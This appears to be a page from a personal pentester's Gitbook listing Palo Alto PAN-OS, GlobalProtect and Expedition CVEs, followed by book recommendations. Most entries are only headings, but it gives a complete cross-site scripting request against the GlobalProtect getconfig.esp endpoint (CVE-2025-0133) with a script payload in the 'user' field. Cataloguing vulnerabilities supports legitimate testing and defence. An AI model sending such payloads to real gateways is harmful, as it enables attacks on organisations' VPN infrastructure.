Palo Alto
Palo Alto Exploits
CVE-2025-0133 - XSS
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computerNuclei Template:
CVE-2025-0110 - PAN-OS Command Injection
CVE-2025-0108 - Authentication Bypass
CVE-2024-3400 Palo Alto File Write Exploit
PAN-OS management interface unauth RCE (CVE-2024-0012 + CVE-2024-9474
Palo Alto Global Protect
Palo Alto Networks Expedition
CVE-2024-5910 - Remotely reset the Expedition application admin credentials
CVE-2024-9463 - RCE unauthenticated
Ref: https://x.com/watchtowrcyber/status/1844306954245767623?t=ibt0GSdt3qTVwHw54pdM1A&s=03
CVE-2024-9464 - Authenticated command injection vulnerability
CVE-2024-9465 - Unauthenticated SQL Injection
Interesting Books
Interesting BooksThe Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
Support this Gitbook
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Last updated



